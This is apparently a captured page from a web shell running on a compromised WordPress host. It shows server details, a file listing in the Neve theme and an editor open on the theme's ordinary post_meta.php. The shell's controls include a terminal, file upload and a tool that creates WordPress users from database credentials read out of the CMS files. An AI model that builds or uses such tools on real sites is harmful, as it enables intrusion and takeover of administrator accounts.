Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
infrops.pl
/
wp-content
/
themes
/
neve
/
inc
/
views
/
partials
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
comments.php
8.95 KB
-rw-r--r--
2024-04-02 19:03
excerpt.php
2.43 KB
-rw-r--r--
2024-04-02 19:03
post_meta.php
14.54 KB
-rw-r--r--
2024-04-02 19:03
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
post_meta.php
<?php /** * Should handle post meta display. * * Author: Andrei Baicus <andrei@themeisle.com> * Created on: 28/08/2018 * * @package Neve\Views */ namespace Neve\Views\Partials; use Neve\Core\Settings\Config; use Neve\Core\Settings\Mods; use Neve\Views\Base_View; /** * Class Post_Meta * * @package Neve\Views */ class Post_Meta extends Base_View { /** * Function that is run after instantiation. * * @return void */ public function init() { add_filter( 'neve_display_author_avatar', array( $this, 'should_display_author_avatar' ), 15 ); add_action( 'neve_post_meta_archive', array( $this, 'render_meta_list' ), 10, 3 ); add_action( 'neve_post_meta_single', array( $this, 'render_meta_list' ), 10, 3 ); add_action( 'neve_do_tags', array( $this, 'render_tags_list' ) ); add_action( 'wp_enqueue_scripts', array( $this, 'meta_custom_separator' ) ); add_filter( 'neve_gravatar_args', [ $this, 'add_dynamic_gravatar' ] ); } /** * Show/hide author avatar based on customizer option * * @param bool $value option value. * * @return bool */ public function should_display_author_avatar( $value ) { $show_avatar = get_theme_mod( 'neve_author_avatar', false ); if ( is_singular() ) { $show_avatar = get_theme_mod( 'neve_single_post_author_avatar', $show_avatar ); } return $show_avatar; } /** * Add dynamic gravatar values. * * @param array $args_array Avatar args. * * @return mixed */ public function add_dynamic_gravatar( $args_array ) { $meta_key = Config::MODS_ARCHIVE_POST_META_AUTHOR_AVATAR_SIZE; $default = '{ "mobile": 20, "tablet": 20, "desktop": 20 }'; $avatar_size = Mods::to_json( $meta_key, $default ); if ( is_singular( 'post' ) ) { $single_avatar_size = Mods::to_json( Config::MODS_SINGLE_POST_META_AUTHOR_AVATAR_SIZE ); $avatar_size = ! empty( $single_avatar_size ) ? $single_avatar_size : $avatar_size; } $avatar_size = apply_filters( 'neve_author_avatar_size_filter', $avatar_size ); if ( ! isset( $args_array['size'] ) ) { return $args_array; } if ( ! is_array( $avatar_size ) ) { return $args_array; } $args_array['size'] = max( $avatar_size ); return $args_array; } /** * Get the index of the last item on mobile to be able to hide the separator * * @param array $order Meta elements order. * * @return int */ private function get_mobile_last_item( $order ) { $order_length = count( $order ); $last_item_index = -1; for ( $i = 0; $i < $order_length; $i++ ) { for ( $j = $i + 1; $j < $order_length; $j++ ) { if ( ! isset( $order[ $j ]->hide_on_mobile ) || (bool) $order[ $j ]->hide_on_mobile === false ) { $last_item_index = $j; break; } } } return $last_item_index; } /** * Render meta list. * * @param array $order the order array. Passed through the action parameter. * @param bool $as_list Flag to display meta as list or as text. * @param int | null $post_id Post id. */ public function render_meta_list( $order, $as_list = true, $post_id = null ) { if ( ! is_array( $order ) || empty( $order ) ) { return; } // Filter the array to contain only visible elements $order = array_filter( $order, function ( $el ) { return isset( $el->visibility ) && $el->visibility === 'yes'; } ); $order = $this->sanitize_order_array( $order ); $order = array_values( $order ); $pid = $post_id ? $post_id : get_the_ID(); $post_type = get_post_type( $pid ); $markup = $as_list === true ? '<ul class="nv-meta-list">' : '<span class="nv-meta-list nv-dynamic-meta">'; $tag = $as_list === true ? 'li' : 'span'; $last_item_on_mobile = $this->get_mobile_last_item( $order ); $order_length = count( $order ); for ( $i = 0; $i < $order_length; $i++ ) { $meta = $order[ $i ]; $element_class = $last_item_on_mobile === $i ? 'last' : ''; $slug = $meta->slug ?? 'custom'; $format = ! empty( $meta->format ) ? $meta->format : '{meta}'; $element_class .= isset( $meta->hide_on_mobile ) && (bool) $meta->hide_on_mobile === true ? ' no-mobile' : ''; switch ( $slug ) { case 'author': $show_before = $format === '{meta}'; $meta_content = str_replace( '{meta}', self::neve_get_author_meta( $pid, $show_before ), $format ); $markup .= '<' . $tag . ' class="meta author vcard ' . esc_attr( $element_class ) . '">'; $markup .= wp_kses_post( $meta_content ); $markup .= '</' . $tag . '>'; break; case 'date': $date_meta_classes = array( 'meta', 'date', 'posted-on', ); $created = get_the_time( 'U' ); $modified = get_the_modified_time( 'U' ); $has_updated_time = $created !== $modified; $show_updated_time = get_theme_mod( 'neve_show_last_updated_date', false ); if ( is_singular( 'post' ) ) { $show_updated_time = get_theme_mod( 'neve_single_post_show_last_updated_date', $show_updated_time ); } if ( $show_updated_time && $has_updated_time ) { $date_meta_classes[] = 'nv-show-updated'; } $meta_content = str_replace( '{meta}', self::get_time_tags( $pid ), $format ); $markup .= '<' . $tag . ' class="' . esc_attr( implode( ' ', $date_meta_classes ) ) . ' ' . esc_attr( $element_class ) . '">'; $markup .= $meta_content; $markup .= '</' . $tag . '>'; break; case 'category': if ( ! in_array( 'category', get_object_taxonomies( $post_type ) ) ) { break; } $meta_content = str_replace( '{meta}', get_the_category_list( ', ', '', $pid ), $format ); $markup .= '<' . $tag . ' class="meta category ' . esc_attr( $element_class ) . '">'; $markup .= wp_kses_post( $meta_content ); $markup .= '</' . $tag . '>'; break; case 'comments': $comments = self::get_comments( $pid ); if ( empty( $comments ) ) { break; } $meta_content = str_replace( '{meta}', $comments, $format ); $markup .= '<' . $tag . ' class="meta comments ' . esc_attr( $element_class ) . '">'; $markup .= wp_kses_post( $meta_content ); $markup .= '</' . $tag . '>'; break; case 'reading': $allowed_context = apply_filters( 'neve_post_type_supported_list', [ 'post' ], 'block_editor' ); if ( ! in_array( $post_type, $allowed_context ) ) { break; } $reading_time = apply_filters( 'neve_do_read_time', $pid ); if ( empty( $reading_time ) ) { break; } $meta_content = str_replace( '{meta}', $reading_time, $format ); $markup .= '<' . $tag . ' class="meta reading-time ' . esc_attr( $element_class ) . '">'; $markup .= wp_kses_post( $meta_content ); $markup .= '</' . $tag . '>'; break; case 'custom': $custom_meta = apply_filters( 'neve_do_custom_meta', '', $meta, $tag, $pid ); if ( empty( $custom_meta ) ) { break; } $markup .= '<' . $tag . ' class="meta custom ' . esc_attr( $element_class ) . '">'; $markup .= wp_kses_post( $custom_meta ); $markup .= '</' . $tag . '>'; break; case 'default': default: break; } } $markup .= $as_list === true ? '</ul>' : '</span>'; echo ( $markup ); //phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } /** * Makes sure there's a valid meta order array. * * @param array $order meta order array. * * @return mixed */ private function sanitize_order_array( $order ) { $allowed_order_values = apply_filters( 'neve_meta_filter', array( 'author' => __( 'Author', 'neve' ), 'category' => __( 'Category', 'neve' ), 'date' => __( 'Date', 'neve' ), 'comments' => __( 'Comments', 'neve' ), ) ); foreach ( $order as $index => $meta_item ) { if ( isset( $meta_item->blocked ) && isset( $meta_item->slug ) && ! array_key_exists( $meta_item->slug, $allowed_order_values ) ) { unset( $order[ $index ] ); } } return $order; } /** * Get the author meta. * * @param int | null $post_id Post id. * @param bool $show_before Show the 'by' string before the author name. * * @return string | false */ public static function neve_get_author_meta( $post_id = null, $show_before = true ) { global $post; $current_post = $post_id !== null ? get_post( $post_id ) : $post; if ( ! isset( $current_post ) ) { return false; } // we need to set the global post to the current post in order to allow other filters that hook into get_the_author_meta hooks access to the current post. // we reset this at the end of the function. $original_global_post = $post; $post = $current_post; //phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited setup_postdata( $current_post ); $author_id = $current_post->post_author; $user_nicename = get_the_author_meta( 'user_nicename', $author_id ); $display_name = get_the_author_meta( 'display_name', $author_id ); $author_email = get_the_author_meta( 'user_email', $author_id ); $gravatar_args = apply_filters( 'neve_gravatar_args', array( 'size' => 20, ) ); $display_avatar = apply_filters( 'neve_display_author_avatar', false ); $avatar_url = get_avatar_url( $author_email, $gravatar_args ); $avatar_markup = '<img class="photo" alt="' . esc_attr( $display_name ) . '" src="' . esc_url( $avatar_url ) . '" /> '; $markup = ''; if ( $display_avatar ) { $markup .= $avatar_markup; } $markup .= '<span class="author-name fn">'; if ( ! $display_avatar && $show_before ) { $markup .= __( 'by', 'neve' ) . ' '; } $link = sprintf( '<a href="%1$s" title="%2$s" rel="author">%3$s</a>', esc_url( get_author_posts_url( $author_id, $user_nicename ) ), /* translators: %s: Author's display name. */ esc_attr( sprintf( __( 'Posts by %s', 'neve' ), $display_name ) ), $display_name ); $link = apply_filters( 'the_author_posts_link', $link ); $markup .= wp_kses_post( $link ) . '</span>'; /** * Filters the author post meta markup. * * @since 3.5.2 * * @param string $markup The HTML markup used to display the post meta author. * @param int | null $post_id Post id. * @param bool $show_before Show the 'by' sting before the author name. * * @return string */ $markup = apply_filters( 'neve_filter_author_meta_markup', $markup, $post_id, $show_before ); $post = $original_global_post; //phpcs:ignore WordPress.WP.GlobalVariablesOverride.Prohibited return wp_kses_post( $markup ); } /** * Get <time> tags. * * @param int | null $post_id Post id. * @return string */ public static function get_time_tags( $post_id = null ) { $created = get_the_time( 'U', $post_id ); $modified = get_the_modified_time( 'U', $post_id ); $has_updated_time = $created !== $modified; $show_updated_time = get_theme_mod( 'neve_show_last_updated_date', false ); if ( is_singular( 'post' ) ) { $show_updated_time = get_theme_mod( 'neve_single_post_show_last_updated_date', $show_updated_time ); } $format = get_option( 'date_format' ); $prefixes = array( 'published' => '', 'updated' => '', ); /** * Filters the prefix of the published date and the updated date of a post. * * @param array $prefixes { * Prefix location and value. * * @type string $published The prefix for the published date. * @type string $updated The prefix for the updated date. * } * * @since 2.11 */ $prefixes = apply_filters( 'neve_meta_date_prefix', $prefixes ); $updated_time_markup = '<time class="updated" datetime="' . esc_attr( date_i18n( 'c', $modified ) ) . '">'; if ( array_key_exists( 'updated', $prefixes ) && ! empty( $prefixes['updated'] ) ) { $updated_time_markup .= wp_kses_post( $prefixes['updated'] ); } $updated_time_markup .= esc_html( date_i18n( $format, $modified ) ) . '</time>'; if ( $show_updated_time && $has_updated_time ) { return $updated_time_markup; } $time = '<time class="entry-date published" datetime="' . esc_attr( date_i18n( 'c', $created ) ) . '" content="' . esc_attr( date_i18n( 'Y-m-d', $created ) ) . '">'; if ( array_key_exists( 'published', $prefixes ) && ! empty( $prefixes['published'] ) ) { $time .= wp_kses_post( $prefixes['published'] ); } $time .= esc_html( date_i18n( $format, $created ) ) . '</time>'; if ( ! $has_updated_time ) { return $time; } $time .= $updated_time_markup; return $time; } /** * Get the comments with a link. * * @param int | null $post_id Post id. * * @return string|false */ public static function get_comments( $post_id = null ) { if ( ! get_post( $post_id ) ) { return false; } if ( ! comments_open( $post_id ) ) { return false; } $comments_number = get_comments_number( $post_id ); if ( $comments_number < 1 ) { return false; } /* translators: %s: number of comments */ $comments = sprintf( _n( '%s Comment', '%s Comments', $comments_number, 'neve' ), $comments_number ); return '<a href="' . esc_url( get_comments_link( $post_id ) ) . '">' . esc_html( $comments ) . '</a>'; } /** * Render the tags list. */ public function render_tags_list() { $tags = get_the_tags(); if ( ! is_array( $tags ) ) { return; } $html = '<div class="nv-tags-list">'; $html .= '<span>' . __( 'Tags', 'neve' ) . ':</span>'; foreach ( $tags as $tag ) { $tag_link = get_tag_link( $tag->term_id ); $html .= '<a href=' . esc_url( $tag_link ) . ' title="' . esc_attr( $tag->name ) . '" class=' . esc_attr( $tag->slug ) . ' rel="tag">'; $html .= esc_html( $tag->name ) . '</a>'; } $html .= ' </div> '; echo $html; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } /** * Change metadata separator according to the customizer setting */ public function meta_custom_separator() { $separator = get_theme_mod( 'neve_metadata_separator', esc_html( '/' ) ); if ( is_singular() ) { $separator = get_theme_mod( 'neve_single_post_metadata_separator', $separator ); } $separator = apply_filters( 'neve_metadata_separator_filter', $separator ); $custom_css = ''; $custom_css .= '.nv-meta-list li.meta:not(:last-child):after { content:"' . esc_html( $separator ) . '" }'; $custom_css .= '.nv-meta-list .no-mobile{ display:none; }'; $custom_css .= '.nv-meta-list li.last::after{ content: ""!important; }'; $custom_css .= '@media (min-width: 769px) { .nv-meta-list .no-mobile { display: inline-block; } .nv-meta-list li.last:not(:last-child)::after { content: "' . esc_html( $separator ) . '" !important; } }'; wp_add_inline_style( 'neve-style', $custom_css ); } }
关闭
保存